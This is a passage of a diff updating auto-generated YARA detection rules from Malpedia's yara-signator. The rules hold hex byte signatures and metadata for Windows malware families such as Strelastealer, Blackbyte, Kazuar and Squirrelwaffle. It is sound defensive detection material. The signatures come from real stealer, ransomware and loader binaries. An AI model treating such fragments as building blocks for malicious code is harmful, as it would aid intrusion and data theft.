+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nokoyawa_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "df938443ce3aca6f9d40529b8ac059dfa5d88a7d6127ee28afd16bed66ad9fc4"
+		logic_hash = "d0e099f2b3c7d0be14ed25c33931a83caac7b50df6157dc4628f695a1c582f8e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82761,34 +82759,34 @@ rule MALPEDIA_Win_Petrwrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442458 8bf9 0fa4c119 33f2 c1e019 }
-		$sequence_1 = { 894c241c 3bcf 763b 6845030000 68???????? 6a44 6a68 }
-		$sequence_2 = { 68???????? 57 e8???????? 83c408 85c0 0f89ff010000 57 }
-		$sequence_3 = { 3bd9 7301 47 8b442414 89700c 8b4508 33f6 }
-		$sequence_4 = { 50 e8???????? 83c410 ff15???????? 8945b4 b808000000 e8???????? }
-		$sequence_5 = { 83c430 83c20a 89542444 85d2 }
-		$sequence_6 = { 330c85d01c4400 8b44242c c1e818 330c85d0184400 0fb6c2 330c85d0244400 8bc3 }
-		$sequence_7 = { 8b4c2440 83c42c 894c241c 85c0 7507 6831020000 eb44 }
-		$sequence_8 = { 8b4d00 89450c 8b03 894c2424 8d04b0 2bf2 c1fe1f }
-		$sequence_9 = { 4a 75f5 8b0e c7460406000000 83c114 8d4900 8b01 }
+		$sequence_0 = { 88040a 8b442420 83c010 4898 8b4c2420 83c12c 4863c9 }
+		$sequence_1 = { e8???????? 488905???????? c744243000000000 eb0a 8b442430 ffc0 89442430 }
+		$sequence_2 = { 89448c30 4863442420 8b4c2420 c1e102 }
+		$sequence_3 = { c1e01e 8b4c2408 c1e902 0bc1 89442408 33c0 85c0 }
+		$sequence_4 = { 33d2 488b442430 488b4850 e8???????? }
+		$sequence_5 = { 8bca 8b942438010000 03d1 8bca 8d84089979825a 8b4c2410 }
+		$sequence_6 = { 85c0 7411 488b542468 488b4c2460 e8???????? eb0a 488b4c2460 }
+		$sequence_7 = { 486bc000 488b4c2440 8b542420 39540114 7326 b804000000 486bc001 }
+		$sequence_8 = { e8???????? 85c0 742a 4c8b8c24c8000000 4c8b8424c0000000 488b9424b8000000 }
+		$sequence_9 = { c644242b61 c644242c6e c644242d64 c644242e20 c644242f31 c644243036 c64424312d }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 92160
 }
-rule MALPEDIA_Win_Strelastealer_Auto : FILE
+rule MALPEDIA_Win_Nachocheese_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e21e6c9-b196-5772-9b5f-024320f3473e"
+		id = "0d1d5a3a-67ce-5c34-82de-43ee9a1b9d3b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strelastealer_auto.yar#L1-L230"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nachocheese_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "fdd1b910b27b0b34d135da8196d66e4e45cba2823b849a416c07e1720765f896"
+		logic_hash = "cb72c9411818be36907dbdd85a36216d8cf0f5bc33a5604f0609af1c56f21889"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82800,46 +82798,38 @@ rule MALPEDIA_Win_Strelastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0575910000 41b91b000000 4889442420 e8???????? 4883c438 }
-		$sequence_1 = { ff15???????? 85c0 0f854effffff 488bcb ff15???????? 4881c4d8050000 }
-		$sequence_2 = { 50 e8???????? 8b44242c 83c40c 53 53 }
-		$sequence_3 = { 08c1 20ca 80f101 89c8 }
-		$sequence_4 = { a1???????? 668b08 56 8d5306 55 }
-		$sequence_5 = { 488bc2 488d0d05c50000 0f57c0 48890b }
-		$sequence_6 = { 015304 eb55 4d85c0 7e27 488bd7 4c8b4dc7 4b8b8ccbc0120600 }
-		$sequence_7 = { 53 53 6804010000 8d94247c030000 52 }
-		$sequence_8 = { 488d05bd430100 488945e0 895128 488d0d87a30000 }
-		$sequence_9 = { 56 53 57 ff15???????? 8bf0 8b442418 8930 }
-		$sequence_10 = { 08c1 08da 80f201 89c8 }
-		$sequence_11 = { 08c1 0f1f440000 b810000000 e8???????? }
-		$sequence_12 = { b913000000 4c8d05d3800000 e8???????? 4885c0 7417 49ba7032d8542306ddea }
-		$sequence_13 = { 488d05afff0000 483bd8 74d1 488bcb }
-		$sequence_14 = { 8945e4 3d00010000 7d10 8a8c181d010000 888810b80010 40 }
-		$sequence_15 = { 03c7 751f 488b85a0010000 488b8888000000 488d0505540100 }
-		$sequence_16 = { 50 6819000200 53 8d8c246c010000 51 6801000080 }
-		$sequence_17 = { 488d4c2430 ff15???????? 488d3d2a5e0100 488bcf ff15???????? }
-		$sequence_18 = { 0fb6c0 eb12 8b45e0 8a8014b90010 08443b1d 0fb64601 47 }
-		$sequence_19 = { 01c7 897d14 8d1401 81c200040000 }
-		$sequence_20 = { 01c1 b8dc8856d3 29c8 b9dd8856d3 }
-		$sequence_21 = { 33c9 4c8d054be10000 488d154ce10000 e8???????? 4885c0 740f 488bcb }
-		$sequence_22 = { 305106 33d2 f7f6 0fb68220a30010 304107 }
-		$sequence_23 = { 08c1 08d3 89ca 80e201 }
+		$sequence_0 = { 2bfa 8d47fd 3901 8901 }
+		$sequence_1 = { 3d2cc00000 7f18 3d2bc00000 7d1b }
+		$sequence_2 = { 33c4 89842498210000 833d????????02 53 56 }
+		$sequence_3 = { 3d9c000000 7c07 3d9f000000 7e0d }
+		$sequence_4 = { 8b5f18 85f6 7504 33c0 eb1e }
+		$sequence_5 = { 83c404 8975fc 8d4900 e8???????? 8bf0 85f6 }
+		$sequence_6 = { 8d4813 894dec 8955fc 53 }
+		$sequence_7 = { 3d2bc00000 7d1b 3d9c000000 7c07 }
+		$sequence_8 = { 81fb80000000 7305 83c302 eb29 81fb00010000 7305 }
+		$sequence_9 = { 5b 8be5 5d c20400 8d4508 50 681d002000 }
+		$sequence_10 = { 33c8 894710 8b4708 33c1 }
+		$sequence_11 = { 33c0 c3 05d13fffff 83f801 }
+		$sequence_12 = { 83ec0c 53 56 57 33f6 6a03 }
+		$sequence_13 = { 8b4508 8d55a8 52 33c9 50 }
+		$sequence_14 = { 52 89bddcf9ffff e8???????? 83c404 }
+		$sequence_15 = { 3d9f000000 7e0d 33c0 c3 }
 
 	condition:
-		7 of them and filesize < 872448
+		7 of them and filesize < 1064960
 }
-rule MALPEDIA_Win_Pipemagic_Auto : FILE
+rule MALPEDIA_Win_Shadowhammer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fdb60c65-afb1-53e4-9d93-0cc68c23b592"
+		id = "297b3240-9669-5c2f-9f70-bac21eea5e4b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemagic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipemagic_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadowhammer_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1b197c324b04c72fd062b82fb8bf23069786730f7c016ad9418e03227253d020"
+		logic_hash = "910985146f49579376d7edf79ed10031d031e34957a06d7ed180548cab7651ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82853,34 +82843,34 @@ rule MALPEDIA_Win_Pipemagic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bcf e8???????? 8bc8 85c9 7510 53 }
-		$sequence_1 = { ff15???????? 59 c7431003000000 5f 5e 5b c9 }
-		$sequence_2 = { 0f8722010000 8b513c 03d1 8955f8 8d82f8000000 3bc3 0f870c010000 }
-		$sequence_3 = { 8945e4 85db 0f8499020000 8b5508 8a01 }
-		$sequence_4 = { e8???????? a1???????? 33c9 894dd8 }
-		$sequence_5 = { 8b00 eb03 8b4508 6a04 }
-		$sequence_6 = { 59 51 8b4dec 57 e8???????? 57 }
-		$sequence_7 = { 83e801 7404 32c0 eb23 e8???????? eb1a e8???????? }
-		$sequence_8 = { 8d542410 8bce e8???????? e9???????? 83f803 750e }
-		$sequence_9 = { 7404 8b38 eb03 8b7dfc 807e0c00 7530 53 }
+		$sequence_0 = { 56 57 33f6 bfa8a24000 833cf55490400001 751d 8d04f550904000 }
+		$sequence_1 = { 6a69 668945ae 58 6a49 59 6a44 }
+		$sequence_2 = { 897e70 c686c800000043 c6864b01000043 c7466818934000 6a0d }
+		$sequence_3 = { 5f c3 56 8b35???????? 68287c4000 57 ffd6 }
+		$sequence_4 = { c3 55 8bec 81ec4c030000 c785e4fcffff00b006c7 c785e8fcffffdab6ace6 c785ecfcffffc25c3799 }
+		$sequence_5 = { 3d40984000 741b 3998b4000000 7513 50 e8???????? }
+		$sequence_6 = { ff45fc 8b45fc 3b45f4 7cb7 ebae 8b45f0 ebab }
+		$sequence_7 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466818934000 }
+		$sequence_8 = { 817de00c714000 7311 8b45e0 8b00 85c0 7402 ffd0 }
+		$sequence_9 = { 8b401c 8b08 3bc8 7439 }
 
 	condition:
-		7 of them and filesize < 87040
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Remexi_Auto : FILE
+rule MALPEDIA_Win_Tor_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a43f5f53-342c-554e-8dee-8b775f5bb787"
+		id = "3efe54eb-a7c6-56b3-9bd1-ec8766a85b3b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remexi_auto.yar#L1-L285"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tor_loader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9706deaac2e1169c2e84699b44e0890d8108f6f9e0cb051afcf90fb12b3b28d6"
+		logic_hash = "9c749aa4d74905eff81845b43499929e58555479c62182eca79940824f3864ac"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82892,53 +82882,32 @@ rule MALPEDIA_Win_Remexi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 c706ffffffff e8???????? 83c404 }
-		$sequence_1 = { 890d???????? 68???????? 41 50 a3???????? c705????????02000000 890d???????? }
-		$sequence_2 = { 68???????? 50 ff15???????? 8b0d???????? 8b35???????? 890d???????? 68???????? }
-		$sequence_3 = { 6a10 8d4ddc 8bf0 51 }
-		$sequence_4 = { 6a00 6a02 c785ccfeffff28010000 ff15???????? }
-		$sequence_5 = { 5f c3 56 ff15???????? 57 8b3d???????? }
-		$sequence_6 = { 8945e4 8945e8 b802000000 51 }
-		$sequence_7 = { 56 6824000100 50 57 ff15???????? }
-		$sequence_8 = { a3???????? c705????????02000000 890d???????? ffd6 6a00 6a00 6a00 }
-		$sequence_9 = { 6828010000 8d8dccfeffff 6a00 51 }
-		$sequence_10 = { 50 6a02 ff15???????? 6a10 8d4ddc }
-		$sequence_11 = { 7513 8b45d8 8b4818 8b5104 }
-		$sequence_12 = { 89470c 57 894710 ff15???????? 6a00 6a00 6a01 }
-		$sequence_13 = { c705????????ffffffff c705????????01000000 c705????????00000000 ffd6 83ffff }
-		$sequence_14 = { 52 6a00 68ffff1f00 ffd7 8bf0 }
-		$sequence_15 = { 015518 8b5d14 85db 0f8565fbffff }
-		$sequence_16 = { 488d542450 488d4c2420 e8???????? 488d442420 4889442440 488d542420 }
-		$sequence_17 = { 015330 41 894b0c e9???????? }
-		$sequence_18 = { 488bc3 c60000 44897320 41b901000000 488d1529f30100 488bcf }
-		$sequence_19 = { 016b24 89e8 83c44c 5b }
-		$sequence_20 = { 4898 4885c0 7515 4883fb06 7305 }
-		$sequence_21 = { 015930 3b542408 0f8d10ffffff 8d3c52 }
-		$sequence_22 = { 488bcf e8???????? 4885db 0f8428010000 48837f1810 7227 }
-		$sequence_23 = { 7468 48c74424380f000000 48897c2430 c644242000 4983c9ff }
-		$sequence_24 = { 015330 e9???????? 8b5314 3b5318 0f8d23020000 }
-		$sequence_25 = { 014b30 bf???????? b903000000 8b742418 }
-		$sequence_26 = { e8???????? 48837f1810 48895f10 7205 488b07 eb03 }
-		$sequence_27 = { c3 4053 4883ec20 488d0d73340100 ff15???????? 488d1586340100 }
-		$sequence_28 = { 015330 8a10 eb84 8a5001 }
-		$sequence_29 = { 016b04 83c41c 5b 5e }
-		$sequence_30 = { 0f8540010000 488d1583310100 488bcb e8???????? 4c8bf0 4885c0 0f8421010000 }
+		$sequence_0 = { 90 eb25 4839c8 0f831a030000 4c8d5001 4c39d1 0f8602030000 }
+		$sequence_1 = { bf03000000 488d358e732800 e8???????? 0fb6542447 488b7c2460 4c8b442458 4889c6 }
+		$sequence_2 = { eb0f 488b442438 c6808800000001 4889c7 ba01000000 e9???????? 81fa2251f4eb }
+		$sequence_3 = { 7659 488b842428010000 488b9c2430010000 488b9424f0000000 488b0a 488b7a08 488b7210 }
+		$sequence_4 = { eb29 4889d3 4889c1 4889f0 e8???????? 488b542448 488bb424d0000000 }
+		$sequence_5 = { ebd4 833d????????00 750d 48c705????????00000000 eb0e 488d3dfc515b00 31c9 }
+		$sequence_6 = { eb23 488d056b4d6100 31db 488b6c2410 4883c418 c3 0fb75052 }
+		$sequence_7 = { eb09 4889c7 90 e8???????? 488d0554112200 488b5c2428 488d0d86392700 }
+		$sequence_8 = { 48c7400813000000 488d0deaf90a00 488908 488b4c2410 48894810 4889c3 488d05ad3e0500 }
+		$sequence_9 = { bf04000000 e8???????? 6690 4883fb01 7509 80382d 7504 }
 
 	condition:
-		7 of them and filesize < 614400
+		7 of them and filesize < 13050880
 }
-rule MALPEDIA_Win_Blackbyte_Auto : FILE
+rule MALPEDIA_Win_Sendsafe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3f4218e0-59a8-5f1a-8491-b9f27553e507"
+		id = "14b9e6b6-2043-58da-b1e8-265e07b21f6c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackbyte_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sendsafe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0158273c319395ac538b84dc759203c353b02e7e79481c3f34491558ae9bcead"
+		logic_hash = "1cc8bf83d06a8d8be9a015120fbe9f24392bb542d1a6aed7e6e2573904d5eeb5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82952,38 +82921,32 @@ rule MALPEDIA_Win_Blackbyte_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498d7101 0f1f440000 4839c6 7ce0 4889c6 41b806000000 }
-		$sequence_1 = { 3bc1 7505 e8???????? 4883c304 }
-		$sequence_2 = { 3bc2 72f4 b8ffffffff 4883c420 }
-		$sequence_3 = { 3bc7 7ce0 eb03 488bda }
-		$sequence_4 = { 3bc1 7f4d 33c9 4c63c8 }
-		$sequence_5 = { 4983f851 7553 4c8d4002 4c39c1 }
-		$sequence_6 = { 4989c3 4889cf 488b4c2428 48897c2450 4c895c2468 4b8d0413 90 }
-		$sequence_7 = { 4983f803 0f8f66010000 90 4983f801 0f8fb6000000 }
-		$sequence_8 = { 3bc2 7f2f 4c63d8 85c0 }
-		$sequence_9 = { 0f1005???????? 4c8960e0 4533e4 4c8968d8 }
-		$sequence_10 = { 4983f805 0f8511020000 4c8d4304 4c39c6 }
-		$sequence_11 = { 493b6610 0f8626010000 4883ec70 48896c2468 488d6c2468 }
-		$sequence_12 = { 3bc1 7573 488d4c2448 664585c0 }
-		$sequence_13 = { 3bc1 7558 498bcb 6685d2 }
-		$sequence_14 = { 4989c3 488b8424b0000000 e8???????? 488b4c2468 }
-		$sequence_15 = { 493b6610 767b 4883ec38 48896c2430 488d6c2430 4889442440 49c7c500000000 }
+		$sequence_0 = { 8b5508 52 8d45bc 50 e8???????? 83c40c 8d4dbc }
+		$sequence_1 = { eb07 c745dc00000000 0fb645dc 85c0 0f842f010000 8b4dfc 83c110 }
+		$sequence_2 = { ffd2 83c408 e9???????? 8b4508 8b08 c741146d000000 8b5508 }
+		$sequence_3 = { b904000000 6bd10e 8b4dfc 33441110 3345f4 8945f4 8b55f4 }
+		$sequence_4 = { 8b952cfdffff 837a1410 721c 8b8564fcffff 898524fdffff 8b8d2cfdffff 8b11 }
+		$sequence_5 = { e8???????? 83c414 85c0 0f84e1010000 ff7518 8d4704 57 }
+		$sequence_6 = { e8???????? 83c408 8b4dfc 89411c 8b5508 8b8214010000 c1e003 }
+		$sequence_7 = { e9???????? e8???????? 8bd0 89542434 85d2 7511 684f060000 }
+		$sequence_8 = { eb1e 8b55f4 833a00 7406 c645fe01 eb04 c645fe00 }
+		$sequence_9 = { ff15???????? 8d5508 52 8b4dfc 83c104 e8???????? 8945f8 }
 
 	condition:
-		7 of them and filesize < 9435136
+		7 of them and filesize < 3743744
 }
-rule MALPEDIA_Win_Plurox_Auto : FILE
+rule MALPEDIA_Win_Ngioweb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00819bcc-51e2-53a8-9308-9b7887ed6069"
+		id = "0c36bfdd-8dfc-5ce2-bea9-f354084a9adc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plurox_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ngioweb_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "fa579257df25509063a4df447932e0b25e6ea4c45a2af23b4dfc95998427a19a"
+		logic_hash = "63470bb29a6555e27026baafc523ffac609f0c101ccb6a3d82cc98debb8823c5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82997,32 +82960,32 @@ rule MALPEDIA_Win_Plurox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0416 128bc606091a f6870f1a000000 e10d 21c9 8918 }
-		$sequence_1 = { 0a20 0816 ec bbf2000000 }
-		$sequence_2 = { 300f 353e0fee3c 031e 2200 }
-		$sequence_3 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d 21c9 }
-		$sequence_4 = { 94 f8 21480e 2a15???????? 6f }
-		$sequence_5 = { 6808486409 58 0000 00e4 0487 58 }
-		$sequence_6 = { 0925???????? 0000 c48dcd713240 89f5 }
-		$sequence_7 = { 0416 128bc606091a f6870f1a000000 e10d }
-		$sequence_8 = { 0442 6808486409 58 0000 }
-		$sequence_9 = { 0d04b8ca08 6af3 dac9 0000 00ee }
+		$sequence_0 = { 3bfb 763d 33c0 395d14 8d747efe 0f95c0 894508 }
+		$sequence_1 = { 7569 8b4510 2b45cc 6a16 6a05 50 ff750c }
+		$sequence_2 = { 03c0 50 56 e8???????? 57 56 8945e8 }
+		$sequence_3 = { 8b442404 85c0 7408 8b809c000000 eb02 33c0 c20400 }
+		$sequence_4 = { 50 6a10 8d4604 50 e8???????? eb46 80fa03 }
+		$sequence_5 = { 51 ffd0 8b5f14 68159fa331 56 e8???????? 53 }
+		$sequence_6 = { ff742408 e8???????? 6a00 56 e8???????? 33c0 5e }
+		$sequence_7 = { ff7508 e8???????? 85c0 7531 ff7508 e8???????? 6a00 }
+		$sequence_8 = { 66c745f86900 66c745f67600 66c745f46700 66c745f26200 66c745f06400 668975ee 66c745ec4700 }
+		$sequence_9 = { 395d0c 750d 8b85d8fdffff 85c0 8945fc 7519 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Hotcroissant_Auto : FILE
+rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83ef5f77-5617-5f2c-aab4-e7c78e791ad8"
+		id = "870824b4-58bb-571d-92bf-60311c954be1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hotcroissant_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.squirrelwaffle_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "dce551f3abb53b003bc43a41a6cd9ea09bb62dbd64ab9e901fd3bd3c6af24937"
+		logic_hash = "ca7cf3c3a665a3fb39ef07c14cbbf782e38d67a5236157091e835f3cda65f067"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83036,32 +82999,32 @@ rule MALPEDIA_Win_Hotcroissant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 6a00 68703a0000 6a00 }
-		$sequence_1 = { 6a00 c705????????00000000 ff15???????? 6a00 }
-		$sequence_2 = { 52 50 6a08 ff15???????? 50 ff15???????? 85c0 }
-		$sequence_3 = { ffd6 6800040000 68???????? 68???????? 68???????? ffd6 }
-		$sequence_4 = { 6a01 50 ff15???????? a1???????? 8b35???????? 50 ffd6 }
-		$sequence_5 = { 8b15???????? 33c0 52 a3???????? a3???????? a3???????? }
-		$sequence_6 = { 8b15???????? 52 ffd6 893d???????? }
-		$sequence_7 = { 56 57 683f000f00 33db 53 53 ff15???????? }
-		$sequence_8 = { ffd7 807c30ff5c 8b1d???????? 740a }
-		$sequence_9 = { 8b15???????? 33c0 52 a3???????? a3???????? }
+		$sequence_0 = { 0f44ca 51 e8???????? 8b8690010000 47 }
+		$sequence_1 = { c645fc03 8d55cc 837de010 8b4b10 }
+		$sequence_2 = { 83c408 68???????? 6a14 6a18 }
+		$sequence_3 = { 40 84c9 75f9 2bc7 8d4db8 50 }
+		$sequence_4 = { 50 52 e8???????? 83c40c 8d7b40 ff734c ff15???????? }
+		$sequence_5 = { 8d45ed c7855cf7ffff00000000 c78560f7ffff0f000000 c6854cf7ffff00 3bf0 740f 2bc6 }
+		$sequence_6 = { 0f46c2 50 e8???????? 83c404 85c0 0f848c000000 8d7023 }
+		$sequence_7 = { 2bc2 3bc1 0f82d4000000 837f1410 7202 }
+		$sequence_8 = { 50 8b4508 50 03c1 }
+		$sequence_9 = { 837de010 8b4b10 8b75cc 0f43d6 }
 
 	condition:
-		7 of them and filesize < 591872
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Dnspionage_Auto : FILE
+rule MALPEDIA_Win_Isspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f66d8271-cdd2-51ef-96af-74c2c2b12bda"
+		id = "e2eec2f1-7baf-5dcc-a6aa-a2a11e65c5fc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnspionage_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isspace_auto.yar#L1-L103"
 		license_url = "N/A"
-		logic_hash = "e53e7ef31e7434c4327d38b1a8e0754ac09c84880301d9d6d51e12488698b367"
+		logic_hash = "c1331a8a4f2f7f8169497cb9d4ae59c19406daa94f505a8ed56551a7b1886f8a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83075,32 +83038,30 @@ rule MALPEDIA_Win_Dnspionage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 99 52 50 e8???????? 83c408 8bd0 b9???????? }
-		$sequence_1 = { 33f6 8b4608 034604 0306 50 }
-		$sequence_2 = { 803d????????00 7517 c605????????01 33c0 c605????????01 5b }
-		$sequence_3 = { ff15???????? 83c404 33c0 5f 5e 5b 8b4df8 }
-		$sequence_4 = { 56 8d8500feffff 8bf1 50 e8???????? 838d0cfeffff07 8b4624 }
-		$sequence_5 = { eb0a 8d0492 8d144509000000 8bcf 43 }
-		$sequence_6 = { c7450c00000000 8d4d0c ba???????? 51 8d4df4 }
-		$sequence_7 = { b9???????? e8???????? 6a00 6a01 e8???????? 8bd0 b9???????? }
-		$sequence_8 = { 83c404 8bf8 33f6 0f1f4000 e8???????? 33d2 }
-		$sequence_9 = { ff15???????? 83bdf8feffff00 764a ff15???????? 85c0 7540 8b85f8feffff }
+		$sequence_0 = { 6a23 eb04 6a00 6a2b 68???????? 6a00 }
+		$sequence_1 = { 6800200300 a3???????? e8???????? 6800200300 }
+		$sequence_2 = { 33c5 50 8d45f0 64a300000000 8965e8 c745fc00000000 ff15???????? }
+		$sequence_3 = { eb19 6a00 6a1c eb0a 6a00 6a23 }
+		$sequence_4 = { 6a00 68???????? 68???????? 68???????? 53 ff15???????? 8bf0 }
+		$sequence_5 = { 50 50 6a03 6a02 ff15???????? 894604 }
+		$sequence_6 = { e8???????? 6800010000 8d8600010000 6a00 }
+		$sequence_7 = { 6a00 6a00 6800010000 53 6aff }
 
 	condition:
-		7 of them and filesize < 786432
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Xiangoop_Auto : FILE
+rule MALPEDIA_Win_Kazuar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "361620d5-e5e6-5f74-925d-645a80b78212"
+		id = "ccff8922-162c-572c-8893-65e66a285e05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xiangoop_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kazuar_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f8f21cace7fd103bdd27ecbe99bad091ab92dc71874d8f32014c3d64cede2d0d"
+		logic_hash = "e795bcf133e170c8cc0011c1658f28fb0b95178f81911116117a7619cede54b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83114,32 +83075,32 @@ rule MALPEDIA_Win_Xiangoop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945fc e9???????? e9???????? 837d1020 0f850e040000 b901000000 6bd100 }
-		$sequence_1 = { 81e2ff000000 8b45f4 c1e810 25ff000000 8b0c95587d0110 330c8558650110 8b55f8 }
-		$sequence_2 = { 6bd10d 8b4dfc 890411 ba04000000 6bc206 }
-		$sequence_3 = { 83e801 0f8539010000 c745e414430110 8b4508 }
-		$sequence_4 = { 8b45f4 0fb64c081c 81e1ff000000 c1e108 0bd1 }
-		$sequence_5 = { 57 8d1c8518b00110 8b03 90 8b15???????? 83cfff 8bca }
-		$sequence_6 = { b804000000 6bc805 8b45fc 8b75fc 8b1410 }
-		$sequence_7 = { 8b55f0 c1ea00 81e2ff000000 330495585d0110 b904000000 6bd105 }
-		$sequence_8 = { 8b45dc c1e800 25ff000000 330c85585d0110 ba04000000 6bc203 8b55fc }
